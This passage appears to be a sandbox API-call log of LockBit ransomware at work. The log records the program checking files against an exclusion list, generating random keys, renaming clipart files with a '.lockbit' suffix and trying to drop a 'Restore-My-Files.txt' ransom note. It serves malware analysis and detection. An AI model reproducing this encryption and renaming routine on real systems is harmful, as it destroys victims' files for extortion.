returned 72 [0109.406] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.406] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c60b600, ftCreationTime.dwHighDateTime=0x1bd4b31, ftLastAccessTime.dwLowDateTime=0x600889f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6c60b600, ftLastWriteTime.dwHighDateTime=0x1bd4b31, nFileSizeHigh=0x0, nFileSizeLow=0x31f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="BS00186_.WMF", cAlternateFileName="")) returned 1 [0109.406] lstrcmpiW (lpString1=".", lpString2="BS00186_.WMF") returned -1 [0109.406] lstrcmpiW (lpString1="..", lpString2="BS00186_.WMF") returned -1 [0109.406] PathFindExtensionW (pszPath="BS00186_.WMF") returned=".WMF" [0109.406] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.406] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.406] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.406] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.406] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.406] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.407] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.407] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.407] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.407] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.407] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.407] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.407] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.407] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.407] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.407] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.407] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.407] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.407] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.407] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.407] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.407] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.407] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.407] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.408] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.408] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.408] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.408] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.408] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.408] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.408] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.408] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.408] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.408] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.408] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.408] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.408] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.408] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.408] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.408] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.408] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.408] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.408] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.409] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.409] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.409] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.409] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.409] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BS00186_.WMF") returned 1 [0109.409] lstrcmpiW (lpString1="ntldr", lpString2="BS00186_.WMF") returned 1 [0109.409] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BS00186_.WMF") returned 1 [0109.409] lstrcmpiW (lpString1="bootsect.bak", lpString2="BS00186_.WMF") returned -1 [0109.409] lstrcmpiW (lpString1="autorun.inf", lpString2="BS00186_.WMF") returned -1 [0109.409] lstrcmpiW (lpString1="thumbs.db", lpString2="BS00186_.WMF") returned 1 [0109.409] lstrcmpiW (lpString1="iconcache.db", lpString2="BS00186_.WMF") returned 1 [0109.409] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.409] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF") returned=".WMF" [0109.409] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.409] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.409] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.409] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.410] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.410] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.410] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.410] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.410] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.410] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.410] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.410] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.410] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.410] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.410] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.410] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.410] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.410] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.410] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.410] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.410] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.410] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.410] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.410] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.410] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.410] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.410] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.410] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.411] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF.lockbit") returned 72 [0109.411] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00186_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0109.419] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.419] malloc (_Size=0x40068) returned 0x3ef0008 [0109.419] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=12788) returned 1 [0109.419] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.420] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.420] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0109.420] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.421] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.421] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0109.421] ReadFile (in: hFile=0x3bc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0109.426] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.426] malloc (_Size=0xa6) returned 0x77d800 [0109.426] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0109.427] free (_Block=0x77d800) [0109.427] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00186_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.427] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.427] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.427] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9efd600, ftCreationTime.dwHighDateTime=0x1bd4b30, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf9efd600, ftLastWriteTime.dwHighDateTime=0x1bd4b30, nFileSizeHigh=0x0, nFileSizeLow=0xc20, dwReserved0=0x0, dwReserved1=0x0, cFileName="BS00200_.WMF", cAlternateFileName="")) returned 1 [0109.427] lstrcmpiW (lpString1=".", lpString2="BS00200_.WMF") returned -1 [0109.427] lstrcmpiW (lpString1="..", lpString2="BS00200_.WMF") returned -1 [0109.427] PathFindExtensionW (pszPath="BS00200_.WMF") returned=".WMF" [0109.427] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.427] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.427] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.427] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.428] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.428] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.428] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.428] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.428] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.428] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.428] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.428] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.428] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.428] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.428] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.428] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.428] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.428] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.428] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.428] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.428] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.428] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.428] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.428] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.428] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.428] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.429] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.429] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.429] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.429] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.429] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.429] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.429] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.429] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.429] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.429] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.429] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.429] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.429] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.429] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.429] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.429] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.429] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.429] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.429] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.429] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.429] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.429] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BS00200_.WMF") returned 1 [0109.430] lstrcmpiW (lpString1="ntldr", lpString2="BS00200_.WMF") returned 1 [0109.430] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BS00200_.WMF") returned 1 [0109.430] lstrcmpiW (lpString1="bootsect.bak", lpString2="BS00200_.WMF") returned -1 [0109.430] lstrcmpiW (lpString1="autorun.inf", lpString2="BS00200_.WMF") returned -1 [0109.430] lstrcmpiW (lpString1="thumbs.db", lpString2="BS00200_.WMF") returned 1 [0109.430] lstrcmpiW (lpString1="iconcache.db", lpString2="BS00200_.WMF") returned 1 [0109.430] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.430] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF") returned=".WMF" [0109.431] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.431] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.431] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.431] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.431] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.431] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.431] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.431] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.431] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.431] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.431] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.431] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.431] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.431] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.431] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.431] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.431] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.431] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.431] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.431] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.431] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.431] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.431] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.432] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.432] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.432] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.432] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.432] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.432] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF.lockbit") returned 72 [0109.432] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs00200_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0109.433] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.433] malloc (_Size=0x40068) returned 0x1ff1e60 [0109.433] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3104) returned 1 [0109.433] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.433] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0109.433] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.434] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0109.434] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0109.439] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.439] malloc (_Size=0xa6) returned 0x77d800 [0109.439] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0109.440] free (_Block=0x77d800) [0109.440] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00200_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.440] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.440] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.440] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54fadc00, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x600889f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x54fadc00, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x634, dwReserved0=0x0, dwReserved1=0x0, cFileName="BS00224_.WMF", cAlternateFileName="")) returned 1 [0109.440] lstrcmpiW (lpString1=".", lpString2="BS00224_.WMF") returned -1 [0109.440] lstrcmpiW (lpString1="..", lpString2="BS00224_.WMF") returned -1 [0109.441] PathFindExtensionW (pszPath="BS00224_.WMF") returned=".WMF" [0109.441] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.441] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.441] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.441] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.441] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.441] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.441] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.441] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.441] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.441] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.441] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.441] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.441] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.441] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.441] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.441] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.441] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.441] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.441] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.441] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.441] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.441] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.441] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.441] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.441] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.442] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.442] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.442] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.442] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.442] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.442] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.442] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.442] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.442] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.442] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.442] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.442] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.442] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.442] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.442] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.442] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.442] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.442] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.442] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.442] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.442] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.442] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.442] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BS00224_.WMF") returned 1 [0109.442] lstrcmpiW (lpString1="ntldr", lpString2="BS00224_.WMF") returned 1 [0109.442] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BS00224_.WMF") returned 1 [0109.442] lstrcmpiW (lpString1="bootsect.bak", lpString2="BS00224_.WMF") returned -1 [0109.442] lstrcmpiW (lpString1="autorun.inf", lpString2="BS00224_.WMF") returned -1 [0109.443] lstrcmpiW (lpString1="thumbs.db", lpString2="BS00224_.WMF") returned 1 [0109.443] lstrcmpiW (lpString1="iconcache.db", lpString2="BS00224_.WMF") returned 1 [0109.443] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.443] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS00224_.WMF") returned=".WMF" [0109.443] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.443] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.443] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.443] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.443] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.443] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.443] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.443] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.443] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.443] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.443] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.443] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.443] lstrcmpiW (lpString1=".dbt", 